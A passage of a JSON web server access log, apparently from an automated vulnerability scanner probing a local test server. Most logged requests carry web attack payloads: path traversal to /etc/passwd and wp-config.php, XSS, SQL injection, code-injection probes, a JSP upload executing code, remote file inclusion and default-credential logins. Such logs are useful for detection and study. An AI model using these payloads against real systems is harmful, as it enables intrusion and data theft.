+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29KAXztLk1bBIosCMHlB0GfxPHZ.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 